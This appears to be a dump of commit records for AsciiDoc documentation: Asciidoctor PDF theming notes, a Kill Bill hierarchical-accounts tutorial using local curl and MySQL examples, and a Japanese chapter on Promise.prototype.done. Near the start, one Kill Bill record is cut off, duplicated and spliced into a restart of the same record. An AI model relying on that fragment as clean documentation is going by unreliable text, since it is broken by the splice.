`-theme.yml` is appended to the name to make the file name (i.e., `<name>-theme.yml`).\n\npdf-fontsdir:: The directory where the fonts used by your theme, if any, are located.\n_Specifying an absolute path is recommended._\n\nLet's assume that you've put your theme files inside a directory named `resources` with the following layout:\n\n....\ndocument.adoc\nresources\/\n themes\/\n basic-theme.yml\n fonts\/\n roboto-normal.ttf\n roboto-italic.ttf\n roboto-bold.ttf\n roboto-bold_italic.ttf\n....\n\nHere's how you'd load your theme when calling Asciidoctor PDF:\n\n $ asciidoctor-pdf -a pdf-stylesdir=resources\/themes -a pdf-style=basic -a pdf-fontsdir=resources\/fonts\n\nIf all goes well, Asciidoctor PDF should run without an error or warning.\n\nNOTE: You only need to specify the `pdf-fontsdir` if you are using custom fonts in your theme.\n\nAlternatively, you can skip setting the `pdf-stylesdir` attribute and just pass the absolute path of your theme file to the `pdf-style` attribute.\n\n $ asciidoctor-pdf -a pdf-style=resources\/themes\/basic-theme.yml -a pdf-fontsdir=resources\/fonts\n\nPaths are resolved relative to the current directory.\nHowever, in the future, this may be changed so that paths are resolved relative to the base directory (typically the document's directory).\nTherefore, it's recommend that you specify absolute paths for now to future-proof your configuration.\n\nIf you use images in your theme, the image paths are resolved relative to the theme file.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"26b7b075bc7a0ccffabd29b171078c0053a82292","subject":"Update ha.adoc","message":"Update ha.adoc\n\nFix typos for ha.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/ha.adoc","new_file":"userguide\/tutorials\/ha.adoc","new_contents":"= Hierarchical Accounts Tutorial\n\n== Overview\n\nStarting with Kill Bill 0.18.x, we have introduced support for HA (Hierarchical Accounts), and so in this tutorial we will first review what the feature is about, and then explore how it works and which APIs to use.\n\nLet's first review what we had prior to introducing the HA feature: in Kill Bill terminology, a customer is represented as a Kill Bill `Account`, and such `Account` will then be invoiced based on its current subscriptions and one-off charges.
\nIf you use images in your theme, the image paths are resolved relative to the theme file.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"26b7b075bc7a0ccffabd29b171078c0053a82292","subject":"Update ha.adoc","message":"Update ha.adoc\n\nFix typos for ha.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/ha.adoc","new_file":"userguide\/tutorials\/ha.adoc","new_contents":"= Hierarchical Accounts Tutorial\n\n== Overview\n\nStarting with Kill Bill 0.18.x, we have introduced support for HA (Hierarchical Accounts), and so in this tutorial we will first review what the feature is about, and then explore how it works and which APIs to use.\n\nLet's first review what we had prior to introducing the HA feature: In the Kill Bill terminology, a customer will be represented as a Kill Bill `Account`, and such `Account` will then be invoiced based on its current subscriptions and one-off charges. Payments will also be made by using the default payment method associated with the `Account`.\n\nThe idea with the HA feature is to delegate some of the payment operations associated with an `Account` to a `parent Account`. Some typical use cases for the feature are:\n\n* Affiliate model: In the affiliate model, payments associated with some customers are made through the `parent Account` but each individual `Account` will manage its own subscriptions and will have access to the associated invoices.\n* Sub-Organization: In large organizations, it is common to see sub organizations that work independently, and yet the parent organization is responsible for the payments.\n\nThe new HA feature allows for the following:\n\n* Ability to set an `Account` as the child of another `Account`\n* Ability to specify on an `Account` that it will be responsible for paying its own invoice (current behaviour)\n* Ability to specify on an `Account` that the parent will be responsible for the payments\n* Ability to transfer credit from a child `Account` to a parent `Account`\n* Ability to list all children `Account`\n\n== How does it work?\n\nThe Kill Bill `Account` abstraction has been enhanced to allow specifying a parent `Account` and whether or not that parent `Account` is responsible for paying children's invoices. A parent `Account` is an `Account` that contains one or more children `Account`. When such a parent `Account` exists and when its children have been configured to delegate their payments, the following happens:\n\n1. Every time the system computes a new invoice (or adjusts an existing one) for a given child `Account`, the parent gets notified and also computes a special summary invoice that will include all the items for all the children on a given day.\n2. The payment system will ignore the child invoice as it knows this should be paid by the parent.\n3. At the end of each day (UTC time), the summary invoice will transition from `DRAFT` to `COMMITTED`.\n4. As a result, the payment system will attempt to make a payment for the parent summary invoice using the default payment method associated with the parent `Account`.\n\nAs we can see, each child `Account` can still have its own subscriptions and matching invoices, but associated payments are delegated to the parent through the daily computation of a summary invoice.\n\nThe balance associated with both the child invoice and parent summary invoice will be zero until the end of the day when the transition from `DRAFT` to `COMMITTED` occurs. At this point, if the payment succeeds, then such invoice balances remain at zero. If not, then each invoice balance (child and parent) becomes equal to its invoice amount.\n\nIn terms of dunning (overdue), since the parent `Account` is the one making the payments, the overdue system will compute the dunning state based on the per-tenant overdue configuration and the parent `Account`'s payment state. The children `Account` will inherit the same dunning state as their parent. As a result, one unpaid parent invoice that did not contain any invoice item for a given child would still put this child in an overdue state.\n
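\nIf you want to watch this end-of-day mechanism, a quick check for parent summary invoices that are still awaiting their commit might look like the following sketch (the `invoices` table and the `parent_invoice` and `status` columns are taken from the tutorial queries below; adjust the names if your schema differs):\n\n[source,bash]\n----\nmysql> -- sketch: table\/column names as shown in the tutorial queries below\nmysql> select id, account_id, invoice_date from invoices where parent_invoice = 1 and status = 'DRAFT';\n----\n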
\n\n== Tutorial\n\nLet's create a child `Account` associated with one parent `Account` to see what happens (we assume the default demo bob\/lazar tenant already exists):\n\n\nLet's first create the parent `Account` (we can see its ID in the `Location` header that is being returned) and also add a default payment method:\n\n[source,bash]\n----\ncurl -v \\\n -u admin:password \\\n -H \"X-Killbill-ApiKey: bob\" \\\n -H \"X-Killbill-ApiSecret: lazar\" \\\n -H \"Content-Type: application\/json\" \\\n -H \"X-Killbill-CreatedBy: demo\" \\\n -X POST \\\n --data-binary '{\"name\":\"Parent\",\"email\":\"parent@example.com\",\"currency\":\"USD\"}' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\"\n\n< Location: http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\/09d5dfdf-eff2-4b45-96d8-535ea269178e\n\ncurl -v \\\n -u admin:password \\\n -H \"X-Killbill-ApiKey: bob\" \\\n -H \"X-Killbill-ApiSecret: lazar\" \\\n -H \"Content-Type: application\/json\" \\\n -H \"X-Killbill-CreatedBy: demo\" \\\n -X POST \\\n --data-binary '{\"pluginName\":\"__EXTERNAL_PAYMENT__\",\"pluginInfo\":{}}' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\/09d5dfdf-eff2-4b45-96d8-535ea269178e\/paymentMethods?isDefault=true\"\n----\n\nLet's now create the child `Account` (notice the new fields `parentAccountId` and `isPaymentDelegatedToParent` in the JSON):\n\n[source,bash]\n----\ncurl -v \\\n -u admin:password \\\n -H \"X-Killbill-ApiKey: bob\" \\\n -H \"X-Killbill-ApiSecret: lazar\" \\\n -H \"Content-Type: application\/json\" \\\n -H \"X-Killbill-CreatedBy: demo\" \\\n -X POST \\\n --data-binary '{\"name\":\"C1\",\"email\":\"c1@example.com\",\"currency\":\"USD\",\"parentAccountId\":\"09d5dfdf-eff2-4b45-96d8-535ea269178e\", \"isPaymentDelegatedToParent\":true}' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\"\n\n< Location: http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\/ea58b7dd-eb23-4065-a3e5-980291d45ab8\n----\n\n\nLet's now create a subscription for the child `Account` (we'll use a simple monthly plan with no trial called `zoo-monthly`):\n\n[source,bash]\n----\ncurl -v \\\n -u admin:password \\\n -H \"X-Killbill-ApiKey: bob\" \\\n -H \"X-Killbill-ApiSecret: lazar\" \\\n -H \"Content-Type: application\/json\" \\\n -H \"X-Killbill-CreatedBy: demo\" \\\n -X POST \\\n --data-binary '{\"accountId\":\"ea58b7dd-eb23-4065-a3e5-980291d45ab8\",\"externalKey\":\"s1\",\"planName\":\"zoo-monthly\"}' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/subscriptions\"\n----\n\n\nIf we inspect our DB entries, we see that there is a COMMITTED invoice for the child and a DRAFT invoice for the parent:\n\n\n[source,bash]\n----\nmysql> select * from invoices where account_id = 'ea58b7dd-eb23-4065-a3e5-980291d45ab8'\\\G\n*************************** 1. row ***************************\n record_id: 45545\n id: 742c700d-e957-4948-a0bb-b16c0e4a4ecb\n account_id: ea58b7dd-eb23-4065-a3e5-980291d45ab8\n invoice_date: 2016-12-09\n target_date: 2016-12-09\n currency: USD\n status: COMMITTED\n migrated: 0\n parent_invoice: 0\n created_by: SubscriptionBaseTransition\n created_date: 2016-12-09 21:11:12\naccount_record_id: 6750\n tenant_record_id: 338\n1 row in set (0.00 sec)\n\nmysql> select * from invoices where account_id = '09d5dfdf-eff2-4b45-96d8-535ea269178e'\\\G\n*************************** 1. 
row ***************************\n record_id: 45546\n id: 5a056e57-1089-4d15-a2b2-27df996dfbb1\n account_id: 09d5dfdf-eff2-4b45-96d8-535ea269178e\n invoice_date: 2016-12-09\n target_date: NULL\n currency: USD\n status: DRAFT\n migrated: 0\n parent_invoice: 1\n created_by: CreateParentInvoice\n created_date: 2016-12-09 21:11:13\naccount_record_id: 6749\n tenant_record_id: 338\n1 row in set (0.00 sec)\n----\n\nLet's now move the clock to the end of the day to trigger the transition from `DRAFT` to `COMMITTED`:\n\n[source,bash]\n----\ncurl -v \\\n -X POST \\\n -u admin:password \\\n -H \"X-Killbill-ApiKey: bob\" \\\n -H \"X-Killbill-ApiSecret: lazar\" \\\n -H \"Content-Type: application\/json\" \\\n -H \"X-Killbill-CreatedBy: demo\" \\\n 'http:\/\/127.0.0.1:8080\/1.0\/kb\/test\/clock?requestedDate=2016-12-10'\n----\n\nLet's look again at the parent invoice (and also the item it contains):\n\n[source,bash]\n----\nmysql> select * from invoices where account_id = '09d5dfdf-eff2-4b45-96d8-535ea269178e'\\G\n*************************** 1. row ***************************\n record_id: 45546\n id: 5a056e57-1089-4d15-a2b2-27df996dfbb1\n account_id: 09d5dfdf-eff2-4b45-96d8-535ea269178e\n invoice_date: 2016-12-09\n target_date: NULL\n currency: USD\n status: COMMITTED\n migrated: 0\n parent_invoice: 1\n created_by: CreateParentInvoice\n created_date: 2016-12-09 21:11:13\naccount_record_id: 6749\n tenant_record_id: 338\n1 row in set (0.00 sec)\n\n> select * from invoice_items where invoice_id = '5a056e57-1089-4d15-a2b2-27df996dfbb1'\\G\n*************************** 1. row ***************************\n record_id: 59901\n id: bed7bd0d-4557-435c-9208-f09ef08d36c3\n type: PARENT_SUMMARY\n invoice_id: 5a056e57-1089-4d15-a2b2-27df996dfbb1\n account_id: 09d5dfdf-eff2-4b45-96d8-535ea269178e\n child_account_id: ea58b7dd-eb23-4065-a3e5-980291d45ab8\n bundle_id: NULL\n subscription_id: NULL\n description: ea58b7dd-eb23-4065-a3e5-980291d45ab8 summary\n plan_name: NULL\n phase_name: NULL\n usage_name: NULL\n start_date: NULL\n end_date: NULL\n amount: 34.000000000\n rate: NULL\n currency: USD\n linked_item_id: NULL\n created_by: CreateParentInvoice\n created_date: 2016-12-09 21:11:13\naccount_record_id: 6749\n tenant_record_id: 338\n----\n\n\nWe can see that the parent invoice contains only one `PARENT_SUMMARY` item and that its state is now `COMMITTED` as expected.\n\nLet's now verify what happens on the payment side:\n\n[source,bash]\n----\n mysql> select * from payments where account_id = '09d5dfdf-eff2-4b45-96d8-535ea269178e'\\G\n *************************** 1. row ***************************\n record_id: 17634\n id: b75a7646-091d-471c-824c-4cef375de714\n account_id: 09d5dfdf-eff2-4b45-96d8-535ea269178e\n payment_method_id: 857aea5d-9c55-475b-8094-7746e96448de\n external_key: e9f07f58-4332-44ee-8c4a-05c89395a308\n state_name: PURCHASE_SUCCESS\n last_success_state_name: PURCHASE_SUCCESS\n created_by: PaymentRequestProcessor\n created_date: 2016-12-10 00:00:00\n updated_by: PaymentRequestProcessor\n updated_date: 2016-12-10 00:00:00\n account_record_id: 6749\n tenant_record_id: 338\n 1 row in set (0.00 sec)\n\n mysql> \n mysql> select * from payments where account_id = 'ea58b7dd-eb23-4065-a3e5-980291d45ab8'\\G\n Empty set (0.01 sec)\n \n----\n\n\nAs expected we see one payment for the parent invoice and no payment for the child.\n\n== Conclusion\n\nThere is a lot more to demo (regarding dunning, invoice adjustment, ...), but this should provide a highlight of what the feature is about. 
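\nFor example, fetching all the children of a parent `Account` (the \"list all children\" capability from the overview) might look like the sketch below; note that the exact `children` endpoint path is an assumption here, so verify it against the API reference of your Kill Bill version:\n\n[source,bash]\n----\n# sketch: the \/children path is an assumption - check your Kill Bill version's API reference\ncurl -v \\\n -u admin:password \\\n -H \"X-Killbill-ApiKey: bob\" \\\n -H \"X-Killbill-ApiSecret: lazar\" \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\/09d5dfdf-eff2-4b45-96d8-535ea269178e\/children\"\n----\n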
Note that this is a new feature in 0.18 and as such it should be seen as Beta (you are responsible for verifying that it works according to your use case, load, ...).\n\nIn the future, we may want to add the ability to unparent children (feature is not supported yet).\n\n","old_contents":"= Hierarchical Accounts Tutorial\n\n== Overview\n\nStarting with Kill Bill 0.18.x, we have introduced support of HA (Hierarchical Accounts), and so in this tutorial we will review first what the feature is about, and then explore how it works and which apis to use.\n\nLet's review first what we have prior to introducing the HA feature. In the Kill Bill terminology, a customer will be represented a Kill Bill `Account`, and such `Account` will then be invoiced based on its current subscriptions and one-off charges. Payments will also be made by using the default payment method associated with the `Account`.\n\nThe idea with the HA feature is to delegate some of the payment operations associated to an `Account` to a `parent Account`. Some typical use case for the feature are:\n* Affiliate model: In the affiliate models, payment associated to some customers are made through the `parent Account` but each individual `Account` will manage its own subscriptions and will have access to the associated invoices.\n* Sub-Organization; In large organizations, it is common to see sub organizations that work independently, and yet parent organization is responsible for the payments.\n\nThe new HA feature allows for the following:\n* Ability to set an `Account` as the child of another `Account`\n* Ability to specify on an `Account` that it will be responsible for paying its own invoice (current behaviour)\n* Ability to specify on an `Account` that the parent will be responsible for the payments\n* Ability to transfer credit from child 'Account' to parent 'Account'\n* Ability to list all children `Account`\n\n== How does it work?\n\nThe Kill Bill `Account` abstraction has been enhanced to allow specifying a parent `Account` and whether or not that parent `Account` is responsible to pay children's invoices. A parent `Account` is an `Account` that contains one or more children `Account`. When such a parent `Account` exists and when its children have been configured to delegate their payments, the following happens:\n\n1. Every time the system computes a new invoice (or adjusts an existing one) for a given child `Account`, the parent gets notified and also computes a special summary invoice that will include all the items for all the children on a given day.\n2. The payment system will ignore the child invoice as it knows this should be paid by the parent.\n3. At the end of each day (UTC time), the summary invoice will transition from `DRAFT` to `COMMITTED`\n4. As a result, the payment system will attempt to make a payment for the parent summary invoice using the default payment method associated to the parent `Account`.\n\nAs we can see, each child `Account` can still have its own subscriptions and matching invoices, but associated payments are delegated to the parent through the daily computation of a summary invoice.\n\nThe balance associated with both the child invoice and parent summary invoice will be zero until the end of the day when the transition from `DRAFT` to `COMMITTED` occurs. At this point, if the payment succeeds, then such invoice balances remain to zero. 
If not, then each invoice balance (child and parent) becomes equal to its invoice amount.\n\nIn terms of dunning (overdue), since parent `Account` are the one making the payments, then overdue system will compute dunning state based on the per-tenant overdue configuration and parent `Account` 's payment state. The children `Account` will inherit the same dunning state as their parent. As a result one unpaid parent invoice that did not contain any invoice item for a given child would still put this child in an overdue state.\n\n\n== Tutorial\n\nLet's create a child `Account` associated to one parent `Account` to see what happens (we assume the defauly demo bob\/lazar tenant already exists):\n\n\nLet's create first the parent `Account` (we can see its ID in the `Location` header that is being returned) and also add a default payment method:\n\n[source,bash]\n----\ncurl -v \\\n -u admin:password \\\n -H \"X-Killbill-ApiKey: bob\" \\\n -H \"X-Killbill-ApiSecret: lazar\" \\\n -H \"Content-Type: application\/json\" \\\n -H \"X-Killbill-CreatedBy: demo\" \\\n -X POST \\\n --data-binary '{\"name\":\"Parent\",\"email\":\"parent@example.com\",\"currency\":\"USD\"}' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\"\n\n< Location: http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\/09d5dfdf-eff2-4b45-96d8-535ea269178e\n\ncurl -v \\\n -u admin:password \\\n -H \"X-Killbill-ApiKey: bob\" \\\n -H \"X-Killbill-ApiSecret: lazar\" \\\n -H \"Content-Type: application\/json\" \\\n -H \"X-Killbill-CreatedBy: demo\" \\\n -X POST \\\n --data-binary '{\"pluginName\":\"__EXTERNAL_PAYMENT__\",\"pluginInfo\":{}}' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\/09d5dfdf-eff2-4b45-96d8-535ea269178e\/paymentMethods?isDefault=true\"\n----\n\nLet's now create the child `Account` (notice the new fields `parentAccountId` and `isPaymentDelegatedToParent` in the json):\n\n[source,bash]\n----\ncurl -v \\\n -u admin:password \\\n -H \"X-Killbill-ApiKey: bob\" \\\n -H \"X-Killbill-ApiSecret: lazar\" \\\n -H \"Content-Type: application\/json\" \\\n -H \"X-Killbill-CreatedBy: demo\" \\\n -X POST \\\n --data-binary '{\"name\":\"C1\",\"email\":\"c1@example.com\",\"currency\":\"USD\",\"parentAccountId\":\"09d5dfdf-eff2-4b45-96d8-535ea269178e\", \"isPaymentDelegatedToParent\":true}' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\"\n\n< Location: http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\/ea58b7dd-eb23-4065-a3e5-980291d45ab8\n----\n\n\nLet's now create a subscription for the child `Account` (we'll use a simple monthly plan with no trial called `zoo-monthly`):\n\n[source,bash]\n----\ncurl -v \\\n -u admin:password \\\n -H \"X-Killbill-ApiKey: bob\" \\\n -H \"X-Killbill-ApiSecret: lazar\" \\\n -H \"Content-Type: application\/json\" \\\n -H \"X-Killbill-CreatedBy: demo\" \\\n -X POST \\\n --data-binary '{\"accountId\":\"ea58b7dd-eb23-4065-a3e5-980291d45ab8\",\"externalKey\":\"s1\",\"planName\":\"zoo-monthly\"}' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/subscriptions\"\n----\n\n\nIf we inspect our DB entries, we see that there a COMMITTED invoice for the child and a DRAFT invoice for the parent:\n\n\n[source,bash]\n----\nmysql> select * from invoices where account_id = 'ea58b7dd-eb23-4065-a3e5-980291d45ab8'\\G\n*************************** 1. 
row ***************************\n record_id: 45545\n id: 742c700d-e957-4948-a0bb-b16c0e4a4ecb\n account_id: ea58b7dd-eb23-4065-a3e5-980291d45ab8\n invoice_date: 2016-12-09\n target_date: 2016-12-09\n currency: USD\n status: COMMITTED\n migrated: 0\n parent_invoice: 0\n created_by: SubscriptionBaseTransition\n created_date: 2016-12-09 21:11:12\naccount_record_id: 6750\n tenant_record_id: 338\n1 row in set (0.00 sec)\n\nmysql> select * from invoices where account_id = '09d5dfdf-eff2-4b45-96d8-535ea269178e'\\G\n*************************** 1. row ***************************\n record_id: 45546\n id: 5a056e57-1089-4d15-a2b2-27df996dfbb1\n account_id: 09d5dfdf-eff2-4b45-96d8-535ea269178e\n invoice_date: 2016-12-09\n target_date: NULL\n currency: USD\n status: DRAFT\n migrated: 0\n parent_invoice: 1\n created_by: CreateParentInvoice\n created_date: 2016-12-09 21:11:13\naccount_record_id: 6749\n tenant_record_id: 338\n1 row in set (0.00 sec)\n----\n\nLet's now move the clock to the end of the day to trigger the transition from `DRAFT` to `COMMITTED`:\n\n[source,bash]\n----\ncurl -v \\\n -X POST \\\n -u admin:password \\\n -H \"X-Killbill-ApiKey: bob\" \\\n -H \"X-Killbill-ApiSecret: lazar\" \\\n -H \"Content-Type: application\/json\" \\\n -H \"X-Killbill-CreatedBy: demo\" \\\n 'http:\/\/127.0.0.1:8080\/1.0\/kb\/test\/clock?requestedDate=2016-12-10'\n----\n\nLet's look again at the parent invoice (and also the item it contains):\n\n[source,bash]\n----\nmysql> select * from invoices where account_id = '09d5dfdf-eff2-4b45-96d8-535ea269178e'\\G\n*************************** 1. row ***************************\n record_id: 45546\n id: 5a056e57-1089-4d15-a2b2-27df996dfbb1\n account_id: 09d5dfdf-eff2-4b45-96d8-535ea269178e\n invoice_date: 2016-12-09\n target_date: NULL\n currency: USD\n status: COMMITTED\n migrated: 0\n parent_invoice: 1\n created_by: CreateParentInvoice\n created_date: 2016-12-09 21:11:13\naccount_record_id: 6749\n tenant_record_id: 338\n1 row in set (0.00 sec)\n\n> select * from invoice_items where invoice_id = '5a056e57-1089-4d15-a2b2-27df996dfbb1'\\G\n*************************** 1. row ***************************\n record_id: 59901\n id: bed7bd0d-4557-435c-9208-f09ef08d36c3\n type: PARENT_SUMMARY\n invoice_id: 5a056e57-1089-4d15-a2b2-27df996dfbb1\n account_id: 09d5dfdf-eff2-4b45-96d8-535ea269178e\n child_account_id: ea58b7dd-eb23-4065-a3e5-980291d45ab8\n bundle_id: NULL\n subscription_id: NULL\n description: ea58b7dd-eb23-4065-a3e5-980291d45ab8 summary\n plan_name: NULL\n phase_name: NULL\n usage_name: NULL\n start_date: NULL\n end_date: NULL\n amount: 34.000000000\n rate: NULL\n currency: USD\n linked_item_id: NULL\n created_by: CreateParentInvoice\n created_date: 2016-12-09 21:11:13\naccount_record_id: 6749\n tenant_record_id: 338\n----\n\n\nWe can see that the parent invoice contains only one `PARENT_SUMMARY` item and that its state is now `COMMITTED` as expected.\n\nLet's now verify what happens on the payment side:\n\n[source,bash]\n----\n mysql> select * from payments where account_id = '09d5dfdf-eff2-4b45-96d8-535ea269178e'\\G\n *************************** 1. 
row ***************************\n record_id: 17634\n id: b75a7646-091d-471c-824c-4cef375de714\n account_id: 09d5dfdf-eff2-4b45-96d8-535ea269178e\n payment_method_id: 857aea5d-9c55-475b-8094-7746e96448de\n external_key: e9f07f58-4332-44ee-8c4a-05c89395a308\n state_name: PURCHASE_SUCCESS\n last_success_state_name: PURCHASE_SUCCESS\n created_by: PaymentRequestProcessor\n created_date: 2016-12-10 00:00:00\n updated_by: PaymentRequestProcessor\n updated_date: 2016-12-10 00:00:00\n account_record_id: 6749\n tenant_record_id: 338\n 1 row in set (0.00 sec)\n\n mysql> \n mysql> select * from payments where account_id = 'ea58b7dd-eb23-4065-a3e5-980291d45ab8'\\G\n Empty set (0.01 sec)\n \n----\n\n\nAs expected we see one paument for the parent invoice and no payment for the child.\n\n== Conclusion\n\nThere is a lot more to demo (regarding dunning, invoice adjsutment, ...), but this should provide a highlight of what the feature is about. Note that this is a new feature in 0.18 and as such it should be seen as a Beta (you are responsible to verify it works accordingly to your use case, load, ...).\n\nIn the future, we may want to add the ability to unparent children (feature is not supported yet).\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"45931ce290b315d7afa2666bd72d5a70e63a0dec","subject":"chore(promise-done): s\/\u3067\/\u3067\u306e\/","message":"chore(promise-done): s\/\u3067\/\u3067\u306e\/\n","repos":"azu\/promises-book,azu\/promises-book,wenber\/promises-book,cqricky\/promises-book,dieface\/promises-book,cqricky\/promises-book,liyunsheng\/promises-book,xifeiwu\/promises-book,dieface\/promises-book,liyunsheng\/promises-book,dieface\/promises-book,genie88\/promises-book,azu\/promises-book,wenber\/promises-book,mzbac\/promises-book,tangjinzhou\/promises-book,sunfurong\/promise,charlenopires\/promises-book,xifeiwu\/promises-book,wenber\/promises-book,mzbac\/promises-book,sunfurong\/promise,purepennons\/promises-book,xifeiwu\/promises-book,wangwei1237\/promises-book,lidasong2014\/promises-book,lidasong2014\/promises-book,sunfurong\/promise,liyunsheng\/promises-book,azu\/promises-book,oToUC\/promises-book,liubin\/promises-book,wangwei1237\/promises-book,lidasong2014\/promises-book,charlenopires\/promises-book,oToUC\/promises-book,tangjinzhou\/promises-book,liubin\/promises-book,tangjinzhou\/promises-book,purepennons\/promises-book,wangwei1237\/promises-book,oToUC\/promises-book,mzbac\/promises-book,genie88\/promises-book,charlenopires\/promises-book,liubin\/promises-book,genie88\/promises-book,purepennons\/promises-book,cqricky\/promises-book","old_file":"Ch4_AdvancedPromises\/promise-done.adoc","new_file":"Ch4_AdvancedPromises\/promise-done.adoc","new_contents":"[[promise-done]]\n== Promise.prototype.done \u3068\u306f\u4f55\u304b?\n\n\u65e2\u5b58\u306ePromise\u5b9f\u88c5\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u5229\u7528\u3057\u305f\u3053\u3068\u304c\u3042\u308b\u4eba\u306f\u3001\n`then` \u306e\u4ee3\u308f\u308a\u306b\u4f7f\u3046 `done` \u3068\u3044\u3046\u30e1\u30bd\u30c3\u30c9\u3092\u898b\u305f\u3053\u3068\u304c\u3042\u308b\u304b\u3082\u3057\u308c\u307e\u305b\u3093\u3002\n\n\u305d\u308c\u3089\u306e\u30e9\u30a4\u30d6\u30e9\u30ea\u3067\u306f `Promise.prototype.done` 
\u3068\u3044\u3046\u3088\u3046\u306a\u5b9f\u88c5\u304c\u5b58\u5728\u3057\u3001\n\u4f7f\u3044\u65b9\u306f`then`\u3068\u540c\u3058\u3067\u3059\u304c\u3001promise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u8fd4\u3055\u306a\u3044\u3088\u3046\u306b\u306a\u3063\u3066\u3044\u307e\u3059\u3002\n\n`Promise.prototype.done` \u306f\u3001<<es6-promises,ES6 Promises>>\u3084<<promises-aplus,Promises\/A+>>\u306e\u4ed5\u69d8\u306b\u306f\n\u5b58\u5728\u3057\u3066\u3044\u306a\u3044\u8a18\u8ff0\u3067\u3059\u304c\u3001\u591a\u304f\u306e\u30e9\u30a4\u30d6\u30e9\u30ea\u304c\u5b9f\u88c5\u3057\u3066\u3044\u307e\u3059\u3002\n\n\u3053\u306e\u30bb\u30af\u30b7\u30e7\u30f3\u3067\u306f\u3001`Promise.prototype.done`\u3068\u306f\u4f55\u304b?\n\u307e\u305f\u4f55\u6545\u3053\u306e\u3088\u3046\u306a\u30e1\u30bd\u30c3\u30c9\u304c\u591a\u304f\u306e\u30e9\u30a4\u30d6\u30e9\u30ea\u3067\u5b9f\u88c5\u3055\u308c\u3066\u3044\u308b\u304b\u306b\u3064\u3044\u3066\u5b66\u3093\u3067\u3044\u304d\u307e\u3057\u3087\u3046\u3002\n\n=== done\u3092\u4f7f\u3063\u305f\u30b3\u30fc\u30c9\u4f8b\n\n\u5b9f\u969b\u306bdone\u3092\u4f7f\u3063\u305f\u30b3\u30fc\u30c9\u3092\u898b\u3066\u307f\u308b\u3068`done`\u306e\u6319\u52d5\u304c\u5206\u304b\u308a\u3084\u3059\u3044\u3068\u601d\u3044\u307e\u3059\u3002\n\n[source,js]\n[[promise-done-example.js]]\n.promise-done-example.js\n----\ninclude::embed\/embed-promise-done-example.js[]\n----\n\n\u6700\u521d\u306b\u8ff0\u3079\u305f\u3088\u3046\u306b\u3001`Promise.prototype.done`\u306f\u4ed5\u69d8\u3068\u3057\u3066\u306f\u5b58\u5728\u3057\u306a\u3044\u305f\u3081\u3001\n\u5229\u7528\u3059\u308b\u969b\u306f\u5b9f\u88c5\u3055\u308c\u3066\u3044\u308b\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u4f7f\u3046\u304b\u81ea\u5206\u3067\u5b9f\u88c5\u3059\u308b\u5fc5\u8981\u304c\u3042\u308a\u307e\u3059\u3002\n\n\u5b9f\u88c5\u306b\u3064\u3044\u3066\u306f\u5f8c\u3067\u89e3\u8aac\u3057\u307e\u3059\u304c\u3001\u307e\u305a\u306f`then`\u3092\u4f7f\u3063\u305f\u5834\u5408\u3068`done`\u3092\u4f7f\u3063\u305f\u3082\u306e\u3092\u6bd4\u8f03\u3057\u3066\u307f\u307e\u3059\u3002\n\n[source,js]\n.then\u3092\u4f7f\u3063\u305f\u5834\u5408\n----\nvar promise = Promise.resolve();\npromise.then(function () {\n JSON.parse(\"this is not json\");\n}).catch(function (error) {\n console.error(error);\/\/ => \"SyntaxError: JSON.parse: unexpected keyword at line 1 column 1 of the JSON data\"\n});\n----\n\n\n\u6bd4\u3079\u3066\u898b\u308b\u3068\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u9055\u3044\u304c\u3042\u308b\u3053\u3068\u304c\u5206\u304b\u308a\u307e\u3059\u3002\n\n* `done` \u306fpromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u8fd4\u3055\u306a\u3044\n** \u3064\u307e\u308a\u3001done\u306e\u5f8c\u306b`catch`\u7b49\u306e\u30e1\u30bd\u30c3\u30c9\u30c1\u30a7\u30fc\u30f3\u306f\u3067\u304d\u306a\u3044\n* `done` \u306e\u4e2d\u3067\u767a\u751f\u3057\u305f\u30a8\u30e9\u30fc\u306f\u305d\u306e\u307e\u307e\u5916\u306b\u4f8b\u5916\u3068\u3057\u3066\u6295\u3052\u3089\u308c\u308b\n** \u3064\u307e\u308a\u3001Promise\u306b\u3088\u308b\u30a8\u30e9\u30fc\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u304c\u884c\u308f\u308c\u306a\u3044\n\n`done` \u306fpromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u8fd4\u3057\u3066\u3044\u306a\u3044\u306e\u3067\u3001\nPromise 
